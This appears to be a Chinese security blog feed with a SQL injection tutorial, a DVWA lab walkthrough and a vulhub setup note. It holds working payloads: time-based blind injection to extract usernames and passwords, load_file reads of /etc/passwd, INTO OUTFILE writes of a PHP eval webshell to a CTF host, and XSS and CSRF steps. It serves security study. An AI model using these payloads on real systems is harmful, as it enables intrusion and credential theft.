href="https://blog.csdn.net/xiayun1995/article/details/86512290">参考文献</a><br>在了解了bool盲注的基本原理之后我们发现一个问题,手工注入必然会导致时间过程,于是应运而生,我们的双查询注入可以帮助我们避免长时间的枯燥操作直接获取数据库的信息,在讲解之前我们要先了解几个函数</p><h3 id="函数"><a href="#函数" class="headerlink" title="函数"></a>函数</h3><p>rand():随机数函数 返回一个0到1的数<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241656811.png" srcset="/img/loading.gif" lazyload><br>floor():向下取整,floor的向下取整可以帮我们进行去整处理,加入乘法便可以构建任意随机数选择<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241658373.png" srcset="/img/loading.gif" lazyload><br>concat():字符串连接函数,用于连接我们查询到的数据<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241701358.png" srcset="/img/loading.gif" lazyload><br>group by:分组 as (_<em>别名):给查询结果起别名(括号中为自定义的别名)<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241707695.png" srcset="/img/loading.gif" lazyload><br>count():聚合函数<br>这里利用count(</em>)对前面的返回数据进行统计,由于group by 和随机数的原因,有可能会出现重复的键值,当键值重复时就会触发错误,然后报错,由于子查询在错误发生之前就已经完成,所以子查询的内容会随着报错信息一起显示出来<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241709101.png" srcset="/img/loading.gif" lazyload><br>我们这里需要的是第一次的报错,因为在实际过程中我们不可能查询到正确消息,只有在可能遇到错误时才会有返回值</p><h3 id="子查询"><a href="#子查询" class="headerlink" title="子查询"></a>子查询</h3><p>子查询:内部查询,允许把另一个查询嵌套到当前的查询中</p><blockquote><p>MariaDB [dvwa]> SELECT concat(“test: “,(select database())) as a;<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241654803.png" srcset="/img/loading.gif" lazyload><br>操作开始便会先查询(select database()),然后将查询结果与”test: “连接起来,最后返回结果。</p></blockquote><p>在注入的过程中我们不了解库名库表,可以借用information_schema的库来猜测,其中information_schema.schemata中包含了mysql的所有库名,information_schema.tables中包含了所有的表名,information_schema.columns中包含了所有的列名<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241703198.png" srcset="/img/loading.gif" lazyload></p><h3 id="报错注入模板"><a href="#报错注入模板" class="headerlink" title="报错注入模板"></a>报错注入模板</h3><ul><li>select 1/0</li><li>select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a</li><li>extractvalue(1, concat(0x5c,(select user())))</li><li>updatexml(0x3a,concat(1,(select user())),1)</li><li>exp(~(SELECT * from(select user())a))</li><li>ST_LatFromGeoHash((select * from(select * from(select user())a)b))</li><li>GTID_SUBSET(version(), 1)</li></ul><h1 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h1><p>?id=1’ and if(1=1,sleep(5),1)–+<br>判断参数构造。<br>?id=1’and if(length((select database()))>9,sleep(5),1)–+<br>判断数据库名长度</p><p>?id=1’and if(ascii(substr((select database()),1,1))=115,sleep(5),1)–+<br>逐一判断数据库字符<br>?id=1’and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)–+<br>判断所有表名长度</p><p>?id=1’and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)–+<br>逐一判断表名<br>?id=1’and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’users’))>20,sleep(5),1)–+<br>判断所有字段名的长度</p><p>?id=1’and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’users’),1,1))>99,sleep(5),1)–+<br>逐一判断字段名。<br>?id=1’ and if(length((select group_concat(username,password) from users))>109,sleep(5),1)–+<br>判断字段内容长度</p><p>?id=1’ and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)–+<br>逐一检测内容。</p><h1 id="通过sql来getshell"><a href="#通过sql来getshell" class="headerlink" title="通过sql来getshell"></a>通过sql来getshell</h1><h2 id="条件和原理"><a href="#条件和原理" class="headerlink" title="条件和原理"></a>条件和原理</h2><blockquote><p>条件:<br> root权限<br> 知道网站根目录绝对路径<br> secure_file_priv为空或指定目录(@@secure_file_priv参数可以其值)<br> gpc关闭<br>原理:<br> 写入webshell,通过参数执行系统命令,结束后删除webshell<br>附:sqlserver getshell条件和原理<br> 条件:<br> 支持外连<br> 有sa权限<br> 原理:<br> 开启xp_cmd扩展执行系统命令 </p></blockquote><h2 id="读写文件"><a href="#读写文件" class="headerlink" title="读写文件"></a>读写文件</h2><blockquote><p>?id=-1)))))) union select load_file(‘/etc/passwd’),2%23<br>root:x:0:0:root:/root:/bin/ash<br>bin:x:1:1:bin:/bin:/sbin/nologin<br>daemon:x:2:2:daemon:/sbin:/sbin/nologin<br>adm:x:3:4:adm:/var/adm:/sbin/nologin<br>lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin<br>sync:x:5:0:sync:/sbin:/bin/sync<br>shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown<br>halt:x:7:0:halt:/sbin:/sbin/halt<br>mail:x:8:12:mail:/var/mail:/sbin/nologin<br>news:x:9:13:news:/usr/lib/news:/sbin/nologin<br>uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin<br>operator:x:11:0:operator:/root:/sbin/nologin<br>man:x:13:15:man:/usr/man:/sbin/nologin<br>postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin<br>cron:x:16:16:cron:/var/spool/cron:/sbin/nologin<br>ftp:x:21:21::/var/lib/ftp:/sbin/nologin<br>sshd:x:22:22:sshd:/dev/null:/sbin/nologin<br>at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin<br>squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin<br>xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin<br>games:x:35:35:games:/usr/games:/sbin/nologin<br>cyrus:x:85:12::/usr/cyrus:/sbin/nologin<br>vpopmail:x:89:89::/var/vpopmail:/sbin/nologin<br>ntp:x:123:123:NTP:/var/empty:/sbin/nologin<br>smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin<br>guest:x:405:100:guest:/dev/null:/sbin/nologin<br>nobody:x:65534:65534:nobody:/:/sbin/nologin<br>www-data:x:82:82:Linux User,,,:/home/www-data:/sbin/nologin<br>mysql:x:100:101:mysql:/var/lib/mysql:/sbin/nologin<br>nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin</p></blockquote><h2 id="读取nginx配置文件,寻找网站根目录"><a href="#读取nginx配置文件,寻找网站根目录" class="headerlink" title="读取nginx配置文件,寻找网站根目录"></a>读取nginx配置文件,寻找网站根目录</h2><blockquote><p>?id=-1)))))) union select load_file(‘/etc/nginx/nginx.conf’),2%23<br>Array ( [0] => Array ( [username] => daemon off; worker_processes auto; error_log /var/log/nginx/error.log warn; events { worker_connections 1024; } http { include /etc/nginx/mime.types; default_type application/octet-stream; sendfile on; keepalive_timeout 65; server { listen 80; server_name localhost; root /var/www/html; index index.php; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; location / { try_files $uri $uri/ /index.php?$args; } location ~ .php$ { try_files $uri =404; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; include fastcgi_params; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; } } } [password] => 2 ) )</p></blockquote><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">Array</span><br>(<br> [<span class="hljs-number">0</span>] => <span class="hljs-title function_ invoke__">Array</span><br> (<br> [username] => daemon off;<br><br>worker_processes auto;<br><br>error_log /<span class="hljs-keyword">var</span>/log/nginx/error.log warn;<br><br>events {<br> worker_connections <span class="hljs-number">1024</span>;<br>}<br><br>http {<br> <span class="hljs-keyword">include</span> /etc/nginx/mime.types;<br> default_type application/octet-stream;<br> sendfile on;<br> keepalive_timeout <span class="hljs-number">65</span>;<br><br> server {<br> listen <span class="hljs-number">80</span>;<br> server_name localhost;<br> root /<span class="hljs-keyword">var</span>/www/html;<br> index index.php;<br><br> proxy_set_header Host <span class="hljs-variable">$host</span>;<br> proxy_set_header X-Real-IP <span class="hljs-variable">$remote_addr</span>;<br> proxy_set_header X-Forwarded-For <span class="hljs-variable">$proxy_add_x_forwarded_for</span>;<br><br> location / {<br> try_files <span class="hljs-variable">$uri</span> <span class="hljs-variable">$uri</span>/ /index.php?<span class="hljs-variable">$args</span>;<br> }<br><br> location ~ \.php$ {<br> try_files <span class="hljs-variable">$uri</span> =<span class="hljs-number">404</span>;<br> fastcgi_pass <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span>:<span class="hljs-number">9000</span>;<br> fastcgi_index index.php;<br> <span class="hljs-keyword">include</span> fastcgi_params;<br> fastcgi_param SCRIPT_FILENAME <span class="hljs-variable">$document</span>_root<span class="hljs-variable">$fastcgi_script_name</span>;<br> }<br><br> }<br>}<br> [password] => <span class="hljs-number">2</span><br> )<br><br>)<br></code></pre></td></tr></table></figure><h2 id="写入php探针"><a href="#写入php探针" class="headerlink" title="写入php探针:"></a>写入php探针:</h2><blockquote><p>?id=-1)))))) union select ‘<?php phpinfo();?>‘,2 into outfile ‘/var/www/html/info.php’%23<br><a href="http://node6.anna.nssctf.cn:28413/info.php">http://node6.anna.nssctf.cn:28413/info.php</a></p></blockquote><h2 id="写入webshell"><a href="#写入webshell" class="headerlink" title="写入webshell"></a>写入webshell</h2><blockquote><p>?id=-1)))))) union select ‘<?php eval($_POST["cc"]);?>‘,2 into outfile ‘/var/www/html/cc.php’%23<br>蚁剑连接:<a href="http://node6.anna.nssctf.cn:28413/cc.php">http://node6.anna.nssctf.cn:28413/cc.php</a> 密码cc</p></blockquote>]]></content>
<summary type="html"><h1 id="sqli开头简介"><a href="#sqli开头简介" class="headerlink" title="sqli开头简介"></a>sqli开头简介</h1><p>sql注入我们可以理解为,通过构造恶意的输入,从而让程序执行我们想要执行的代码。所以我们需要</summary>
<category term="SQL" scheme="https://fogpost.top/categories/SQL/"/>
<category term="sql" scheme="https://fogpost.top/tags/sql/"/>
</entry>
<entry>
<title>dvwa全解</title>
<link href="https://fogpost.top/2024/11/23/dvwa%E5%85%A8%E8%A7%A3/"/>
<id>https://fogpost.top/2024/11/23/dvwa%E5%85%A8%E8%A7%A3/</id>
<published>2024-11-23T04:35:02.000Z</published>
<updated>2024-11-26T11:14:52.795Z</updated>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>说到靶机,那么经典的dvwa靶机肯定不能错过,它是一款非常适合新手入门的靶机,它集成了多种漏洞,并且可以自由选择难度,非常适合新手入门,想玩的话自己搭建就好,我这是在服务器上搭的,用来玩玩</p><h2 id="Low"><a href="#Low" class="headerlink" title="Low"></a>Low</h2><h3 id="Brute-Force"><a href="#Brute-Force" class="headerlink" title="Brute Force"></a>Brute Force</h3><p>随便输入后便是这个返回值,说明密码错误<br><img src="https://gitee.com/fogpost/photo/raw/master/202411231240412.png" srcset="/img/loading.gif" lazyload><br>我们用抓包软件抓包,然后发送到repeat,yakit的爆破采用的是文件标签,原理是和bp一样的对字典有要求,利用响应的大小来判断正误<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261753518.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411261806101.png" srcset="/img/loading.gif" lazyload></p><h3 id="command-injection"><a href="#command-injection" class="headerlink" title="command injection"></a>command injection</h3><p>直接在ip查询后面加入的命令执行,可怕可怕,cat也可以执行<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261810028.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411261811659.png" srcset="/img/loading.gif" lazyload></p><h3 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h3><p>抓取原来修改密码的报文后在yakit中修改略微,重放便可以修改密码,也可以将网址修改一部分再重放,同样修改成功<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261817959.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411261818130.png" srcset="/img/loading.gif" lazyload><br>这个过程有个技巧就是长链变短链,利用站长工具即可实现,防止社工时让受击者发现<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261824846.png" srcset="/img/loading.gif" lazyload><br>还可以页面构造</p><h3 id="XSS-DOM"><a href="#XSS-DOM" class="headerlink" title="XSS(DOM)"></a>XSS(DOM)</h3><p>查看页面源码,没有php代码,仅有js代码,我们可以利用js脚本<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261914977.png" srcset="/img/loading.gif" lazyload><br>点击英文发现,存在一个明文网址,我们可以利用这个English来做个文章</p><blockquote><p><a href="http://110.41.22.24/vulnerabilities/xss_d/?default=English">http://110.41.22.24/vulnerabilities/xss_d/?default=English</a></p></blockquote><blockquote><p><a href="http://110.41.22.24/vulnerabilities/xss_d/?default=%5C">http://110.41.22.24/vulnerabilities/xss_d/?default=\</a><script>alert('xss')</script></p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411261906137.png" srcset="/img/loading.gif" lazyload></p><h3 id="XSS-Reflected"><a href="#XSS-Reflected" class="headerlink" title="XSS(Reflected)"></a>XSS(Reflected)</h3><p>反射式XSS,查看源码,同上只不过这次是在输入框中进行反射<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261914096.png" srcset="/img/loading.gif" lazyload></p><blockquote><p><script>alert('xss')</script></p></blockquote><p>拿cookie</p><blockquote><p><script>alert(document.cookie)</script><br><img src="https://gitee.com/fogpost/photo/raw/master/202411261911735.png" srcset="/img/loading.gif" lazyload></p></blockquote>]]></content>
<summary type="html"><h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>说到靶机,那么经典的dvwa靶机肯定不能错过,它是一款非常适合新手入门的靶机,它集成了多种漏洞,并且可以自由选择难度,非常适合新手入门,想玩</summary>
<category term="渗透测试" scheme="https://fogpost.top/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="dvwa" scheme="https://fogpost.top/tags/dvwa/"/>
</entry>
<entry>
<title>vulhub搭建</title>
<link href="https://fogpost.top/2024/11/21/vulhub%E6%90%AD%E5%BB%BA/"/>
<id>https://fogpost.top/2024/11/21/vulhub%E6%90%AD%E5%BB%BA/</id>
<published>2024-11-21T11:22:56.000Z</published>
<updated>2024-11-21T12:09:19.570Z</updated>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>涉及一些经典的漏洞和靶场环境,如果有现成的可以下载固然很好,但是当需要我们自己复现和搭建环境时便会出现许多的bug,这时便需要一个较好的工具来实现便捷的靶场环境构建,这个工具便是vulhub,它是一个基于docker的漏洞环境集合,方便我们快速搭建漏洞环境,作者是p牛也是人尽皆知的离别歌,可以去看看人家的博客网</p><h1 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h1><p>vulhub是个基于docker的工具平台,自行下载docker和docker-compose</p><h2 id="下载Vulhub"><a href="#下载Vulhub" class="headerlink" title="下载Vulhub"></a>下载Vulhub</h2><p>任意创建一个文件夹,从github获取对应的靶场环境,然后进入vulhub目录</p><blockquote><p>git clone <a href="https://github.com/vulhub/vulhub.git">https://github.com/vulhub/vulhub.git</a><br>cd vulhub</p></blockquote><p>随便进入一个目录,比如shiro,ls+cd进入想要的cve文件中启动docker-compose<br>即可创建靶场,注意内存资源的分配,以及部分漏洞各个工具的版本问题<br><img src="https://gitee.com/fogpost/photo/raw/master/202411211945375.png" srcset="/img/loading.gif" lazyload></p><p>搭建还是挺简单的</p>]]></content>
<summary type="html"><h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>涉及一些经典的漏洞和靶场环境,如果有现成的可以下载固然很好,但是当需要我们自己复现和搭建环境时便会出现许多的bug,这时便需要一个较好的工具</summary>
<category term="工具" scheme="https://fogpost.top/categories/%E5%B7%A5%E5%85%B7/"/>
<category term="tool" scheme="https://fogpost.top/tags/tool/"/>
</entry>
</feed>